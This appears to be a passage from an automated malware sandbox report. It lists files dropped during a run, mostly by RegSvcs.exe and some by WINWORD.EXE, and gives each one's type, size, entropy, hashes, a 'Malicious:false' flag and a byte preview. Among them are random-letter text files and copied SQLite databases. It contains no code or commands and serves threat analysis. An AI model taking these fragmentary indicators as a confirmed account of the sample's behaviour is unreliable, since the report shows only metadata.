                                          Category:dropped
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:3:ggPYV:rPYV
                                          MD5:187F488E27DB4AF347237FE461A079AD
                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                          Malicious:false
                                          Preview:[ZoneTransfer]....ZoneId=0
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1026
                                          Entropy (8bit):4.69782189124949
                                          Encrypted:false
                                          SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                          MD5:0640503E533EFB11CC70F43D2FFF4E26
                                          SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
                                          SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                          SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                          Malicious:false
                                          Preview:RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):162
                                          Entropy (8bit):2.4797606462020307
                                          Encrypted:false
                                          SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                          MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                          SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                          SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                          SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                          Malicious:false
                                          Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1026
                                          Entropy (8bit):4.702896917219035
                                          Encrypted:false
                                          SSDEEP:24:/PRNNS0CSvZqsz3phzXGrOVx0E5lpmo3ntC4hUh31nnrgy:/wQvwsz3phzWrOVxXnncRh31nrgy
                                          MD5:C68274AA8B7F713157BEBE2FCC2EA5D3
                                          SHA1:52A5A2D615A813B518DDAAC2A02095F1059DAAD5
                                          SHA-256:362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
                                          SHA-512:BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
                                          Malicious:false
                                          Preview:BPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURSSGYXQXCVEDYOHFVNTWOSWAODXQUYSQDZDKFJYMCQZOAAPCNEEITKKQAOZJLGLFTYOILWUOSTJMBMUSHEQYRRGRAOIGHQXDIXRMKPCYCIDORIRGMLSPAFIUBBOMPKCNUTVROXQQMRPPEYTVHGRIWJQZREOHPNIXFSPUEZGKVJWTNJVDHDCOMTLCENQMHDIOFNLZNLPFMCGQAWNZVHKKTCZJIHININWOCQTMBLXKYEUXUUKCZAKOINULOSSFHJSGRNIDZZLUKXSJKRQIPXODCNMCWZEQEGJHTKEBKCHWRCJJEITXLWRGJUOYWSWNFVRXXLTBNUBFYSNPVKHAJAOKQIGZUIREJCJKNRVWECUBFUQVUSSEVFZFGAGLZHTJIRXFGLLTHCDJRQSVBUTENMMECBKNQAOTCGUKCAUANZSSYPURGXINFDSJOSJXFPPQOKWUJNGLOACGPRELXIXQZZNXUEJPFZQRDXMWSGEPNTSQRNGFYRRORGOCRJKMCRFZPVDFDRDZCHPWYNXBAOHXICQPOHWXUVYMEAZUMLLNZQAOCCUKTGCMNZUMKUHEIUUYFGMSIEUWOKDVUTQHRMSVPQFKZILWLKZLKCAJHKFHZJFEJAIIZQWILLXMKWLUETDBWSKQOQQECLVCWJSIQXHNDZAYVIFNNYOZKGGFZMIYUCHYFNVXUHKZCOQBJAYWMEKPQVFWNVIJXYFYHWXFXSXDCSRYIODDWXNUTAYNOXAVMATSYETUSRJPYJEQCIEGHSXOOCALKHPRGXFNWHDUNNXCXELBKBUMKTJRNZBLLQWINSTBBGQYWIVUZENAMGRAYFSSGBXLPJXWYTCERBJXCYMHQMJPSVPWCDSLLUJZTWDDJDHIADYETBWZFZQTYTPWPBFDIVVSAOFDDHMUMYLEFUUIKC
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1026
                                          Entropy (8bit):4.695860210921229
                                          Encrypted:false
                                          SSDEEP:24:TFQT9Q9JyaMK5Tkl4rqfRs73U2PVD3BWUS:mT9iSRiqfRsxPGt
                                          MD5:71B2CE35DD64EA4E8D5C67BD6BFF698E
                                          SHA1:48D65EB151E97D1D41267A43B4DC1801C4F89255
                                          SHA-256:A6DBE7820A7D3FD17EB24EE41CCE56C9647B150E1A1392F58ABD947EE1829FC7
                                          SHA-512:73128DA16516B0E5D04EB6D859A8FDC4663B47F74A7AAC99263582746BC414BAB05FB4DFF40F5E0EF838682D63671FE11DD6C5891D059D51FFB872E1FD9B60BA
                                          Malicious:false
                                          Preview:FENIVHOIKNBCYIYDETVMHAXXCUSKVBIKIZDOEBTCBYNFPROLSQLGSXMEBIFYTUGWARWVYMTQJJQHOGKAFRWEYLIITISQGUPNXIDRSAYRHVYBLCBPWDGDGMRFUPDGTHSUZALGWUNUNBPRSUWLDEERQZPJULFBMZZHTJYWKVZQVLEDDNLGBWDACOPLRJZKBPCUZDJREYTIGQRDICOOOTVHDKQUIYHXBSIPRQMYKFMFQBOFQNAEVGNCFJMUUNPEAZHDDUMGETMIDSYNOIDGLIWBLWJMUJDZSXZDTSQDRTDTAVJOIMKOGLNUSQUAAVWIKDQYSLHFCCBWRVFCOFFOFLNYESKIXGLREFBUHJNLTUZWTINZBYSZGLBVOBBMXEMHDAPUEBYUOSIBCQKNMEMTLMDFOFSCTXSWXGSMZYXOITZUXDRNGKAWBECBBUVWDKNSCDDEQNOOYGYYOAXMJOTRVNPFWPCZVSEJKHIGKFUWNCSZBXBGNPXFFHNXKDQDNFIONUVXOCROEEFIGZFWGAHIHFQJGZYTVKVZDPYDSXSERFLDJPCVGKHMQFOTHPVOKTYLWAPGHXOGTKAUNDASAZUZHWRURHYWEQLZGBTJRWZBMRYRMEKQZWHBZYXZEMYOBLGWOOWHYBSYOACREZYWYZKZDZWKRVNMAIUFSJMRFNLCHGSJRDBFEVZHVONCJAKDIVXPNZSDFWRJZBNYCVNHSEHCTSXOCQTOLQXZKOFIQXWXQZEAWRCJWAJSYKYOZORHAIEUYWKKUMHQYPYIOSCFFODFUWOINUDONNHLPCLQAFMHQEHKVMPTJGZMRGJZGKKWXKQOCGHCKXSSHZWEGSFCSZBPAQPMKBQLDGHBWUHQXSHUZQGJVNGEWRQKNQTDOVIMFGAUQLLNAVTSEJCTOSENTCVYPTJTCCNNBRJDHLKKWLYCZNBHTKJZYJQTOROFOXGEKHGJMAWOECWOBHFFIQIEISKZOCKOWMGRFEKTINHWHFFOTZPG
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                          Category:dropped
                                          Size (bytes):77824
                                          Entropy (8bit):1.133993246026424
                                          Encrypted:false
                                          SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                          MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                          SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                          SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                          SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                          Category:dropped
                                          Size (bytes):77824
                                          Entropy (8bit):1.133993246026424
                                          Encrypted:false
                                          SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                          MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                          SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                          SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                          SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.7798653713156546
                                          Encrypted:false
                                          SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                          MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                          SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                          SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                          SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.7798653713156546
                                          Encrypted:false
                                          SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                          MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                          SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                          SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                          SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3008001, file counter 24, database pages 5, cookie 0xf, schema 4, UTF-8, version-valid-for 24
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):1.3870145383915669
                                          Encrypted:false
                                          SSDEEP:48:TBLOpEO5J/Kd7UEvqckQaKgj5EZwx1wayEgd7kKK9LeYyBlIAO/tXK:hNw0CKaKfu1wai6LeYzN/9K
                                          MD5:1623709C6B2FB813984B1265C26A85F1
                                          SHA1:CCE4DDBE93E97E68359CB6FD71242F796A785F86
                                          SHA-256:88BCF762A75F085ECD3B12EB2BA81B81A7F8C9CDDDD4DED624BA28566EB7EEAA
                                          SHA-512:6D2E23E4E0D1D912AF3426129F7DE490F23326F6179EEC27AFE28C438CA37493AEA775E62755C76D6A8850DB6D6E70F0D0A8D396A35E869F4BF0F761CDD507D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .........................................................................-........#..k...#.<....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3008001, file counter 24, database pages 5, cookie 0xf, schema 4, UTF-8, version-valid-for 24
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):1.3870145383915669
                                          Encrypted:false
                                          SSDEEP:48:TBLOpEO5J/Kd7UEvqckQaKgj5EZwx1wayEgd7kKK9LeYyBlIAO/tXK:hNw0CKaKfu1wai6LeYzN/9K
                                          MD5:1623709C6B2FB813984B1265C26A85F1
                                          SHA1:CCE4DDBE93E97E68359CB6FD71242F796A785F86
                                          SHA-256:88BCF762A75F085ECD3B12EB2BA81B81A7F8C9CDDDD4DED624BA28566EB7EEAA
                                          SHA-512:6D2E23E4E0D1D912AF3426129F7DE490F23326F6179EEC27AFE28C438CA37493AEA775E62755C76D6A8850DB6D6E70F0D0A8D396A35E869F4BF0F761CDD507D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .........................................................................-........#..k...#.<....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                          Category:dropped
                                          Size (bytes):77824
                                          Entropy (8bit):1.133993246026424
                                          Encrypted:false
                                          SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                          MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                          SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                          SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                          SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1026
                                          Entropy (8bit):4.69782189124949
                                          Encrypted:false
                                          SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                          MD5:0640503E533EFB11CC70F43D2FFF4E26
                                          SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
                                          SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                          SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                          Malicious:false
                                          Preview:RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                          Category:dropped
                                          Size (bytes):77824
                                          Entropy (8bit):1.133993246026424
                                          Encrypted:false
                                          SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                          MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                          SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                          SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                          SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                          Category:dropped
                                          Size (bytes):77824
                                          Entropy (8bit):1.133993246026424
                                          Encrypted:false
                                          SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                          MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                          SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                          SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                          SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                          Category:dropped
                                          Size (bytes):77824
                                          Entropy (8bit):1.133993246026424
                                          Encrypted:false
                                          SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                          MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                          SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                          SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                          SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                          Category:dropped
                                          Size (bytes):77824
                                          Entropy (8bit):1.133993246026424
                                          Encrypted:false
                                          SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                          MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                          SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                          SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                          SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                          Category:dropped
                                          Size (bytes):77824
                                          Entropy (8bit):1.133993246026424
                                          Encrypted:false
                                          SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                          MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                          SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                          SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                          SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                          Category:dropped
                                          Size (bytes):77824
                                          Entropy (8bit):1.133993246026424
                                          Encrypted:false
                                          SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                          MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                          SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                          SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                          SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):131072
                                          Entropy (8bit):0.02574218694590596
                                          Encrypted:false
                                          SSDEEP:6:I3DPc91g0VvxggLRxk1/fxlHH4dRXv//4tfnRujlw//+GtluJ/eRuj:I3DPs1NZC1nx5HmvYg3J/
                                          MD5:2F5BD867B5F59EAAE3CA96DBBD1A7376
                                          SHA1:8C2ABE7614CC0E63698ACCD8E9083C776AD5D523
                                          SHA-256:10BE461A5B839C7734E97D90C328E00E4599AC477D63D371F4B91FD303C263C3
                                          SHA-512:E774F8EAFCAE56694E88AE70F00D21983073D3FAF9F8435B3837157B54091569F2C9911384B8E1B775B661968BC528DD79A2B81F4539A876F666DE696F084ABC
                                          Malicious:false
                                          Preview:......M.eFy...z...[N..H.s...L.S,...X.F...Fa.q............................&}...#O.UO.j.............L.6@..J.........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):131072
                                          Entropy (8bit):0.02559397892310002
                                          Encrypted:false
                                          SSDEEP:6:I3DPceLHvxggLR5JIKhXXp3RXv//4tfnRujlw//+GtluJ/eRuj:I3DPDP3IevvYg3J/
                                          MD5:23C6F7F7AE393C7FDA60682B00E275DE
                                          SHA1:6FDD830D013C8B18D1E387C44265048AB90D5A1F
                                          SHA-256:3757852072EF5F775973D6140983EB9BE23DD25202E6389F2DCFFF80D0550029
                                          SHA-512:D247B00A5ED487ADC737CCCCB26916365D2C01C5A00D2400080915635C0466732FBD35C32522BA285FA280EA1269553A567F7B64B1A31E7AD96E6F08237F7606
                                          Malicious:false
